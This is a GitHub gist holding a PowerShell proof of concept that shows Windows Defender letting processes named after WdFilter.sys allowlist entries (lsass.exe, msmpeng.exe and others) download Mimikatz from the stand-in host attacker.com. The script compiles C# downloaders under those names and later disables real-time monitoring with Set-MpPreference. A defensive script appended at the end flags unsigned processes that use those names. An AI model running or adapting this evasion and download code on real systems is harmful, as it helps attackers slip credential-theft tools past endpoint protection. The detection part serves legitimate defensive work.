@mgeeky
Last active November 19, 2021 23:12
WdFilter.ps1 tests - script accompanying my tweet: https://twitter.com/mariuszbit/status/1450479981855969281
#
# Script that demonstrates that processes carrying specific, hard-coded names
# (taken from WdFilter.sys, see the list below) can download Mimikatz unobstructed.
#
# Tweet related:
# https://twitter.com/mariuszbit/status/1450479981855969281
#
$code = @'
class Program
{
static void Main() {
System.IO.File.WriteAllBytes(
"mimi-FILENAME",
new System.Net.WebClient().DownloadData(
"http://attacker.com/mimikatz.exe"
)
);
}
}
'@
echo "`nWill download file: http://attacker.com/mimikatz.exe`n"
#
# WdFilter.sys - .rdata section
#
$files = @(
"lsass.exe"
"csrss.exe"
"services.exe"
"Register-CimProvider.exe"
"svchost.exe"
"setupcl.exe"
"SrDelayed.exe"
"mpcmdrun.exe"
"msmpeng.exe"
"mpcopyaccelerator.exe"
"nissrv.exe"
"msseces.exe"
)
#
# Make sure Windows Defender's Real-Time monitoring is enabled.
#
Set-MpPreference -DisableRealtimeMonitoring $false
$files | % {
# Strip the ".exe" suffix (anchored, dot escaped) to name the C# source file.
$out = '{0}.cs' -f ($_ -replace '\.exe$', '')
($code -replace 'FILENAME', $_) | Out-File $out
echo "Compiling as $_ ..."
iex "$($env:windir)\Microsoft.NET\Framework64\v4.0.30319\csc.exe $out" `
| Out-Null
echo "Downloading mimi-$_ ... `n"
iex "& .\$_" | Out-Null
del $out | Out-Null
del $_ | Out-Null
}
#
# Disable Real-Time monitoring just to acquire hashes.
# The files were already downloaded, flying past Defender.
#
Set-MpPreference -DisableRealtimeMonitoring $true
Sleep 15
ls *.exe | % {
iex "& sha1sum $_ "
}
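A defender-side counterpart to the test above, added here as an example (not part of the gist): it enumerates running processes whose image name matches one of the WdFilter.sys names listed in the script and flags any whose on-disk binary is not carrying a valid Microsoft signature, which is exactly what the compiled stand-ins produced by the gist would look like. It assumes Windows PowerShell 5.1 (Get-CimInstance, Get-AuthenticodeSignature with catalog support) and an elevated session for full visibility; the function name is this example's own.

```powershell
# Added example, not mgeeky's code: look for processes that borrow a name from the
# WdFilter.sys allowlist but are not validly Microsoft-signed binaries.
$wdFilterNames = @(
    'lsass.exe', 'csrss.exe', 'services.exe', 'Register-CimProvider.exe',
    'svchost.exe', 'setupcl.exe', 'SrDelayed.exe', 'mpcmdrun.exe',
    'msmpeng.exe', 'mpcopyaccelerator.exe', 'nissrv.exe', 'msseces.exe'
)

function Test-WdFilterNameMasquerade {
    # Hypothetical helper name chosen for this example.
    param([string[]]$Names = $wdFilterNames)

    # Win32_Process exposes the on-disk image path; protected processes such as
    # lsass.exe or csrss.exe return $null here when the session is not elevated.
    Get-CimInstance Win32_Process |
        Where-Object { $Names -contains $_.Name } |
        ForEach-Object {
            $path = $_.ExecutablePath
            if (-not $path) {
                [pscustomobject]@{
                    Pid = $_.ProcessId; Name = $_.Name
                    Path = '<inaccessible>'; Verdict = 'unknown (re-run elevated)'
                }
                return
            }
            # Catalog-signed OS binaries report Status 'Valid' with SignatureType
            # 'Catalog'; an ad-hoc csc.exe build has no signature at all.
            $sig = Get-AuthenticodeSignature -FilePath $path
            $msSigned = ($sig.Status -eq 'Valid') -and
                        ($sig.SignerCertificate.Subject -like 'CN=Microsoft *')
            [pscustomobject]@{
                Pid     = $_.ProcessId
                Name    = $_.Name
                Path    = $path
                Verdict = if ($msSigned) { 'ok' } else {
                    'SUSPICIOUS: WdFilter allowlist name, image not Microsoft-signed'
                }
            }
        }
}

Test-WdFilterNameMasquerade | Format-Table -AutoSize
```

The subject-name match is a coarse check; a production detection should also pin the expected image directory per name (System32 for the OS processes, the Defender platform folder for the Mp*/NisSrv binaries) and alert on any other location.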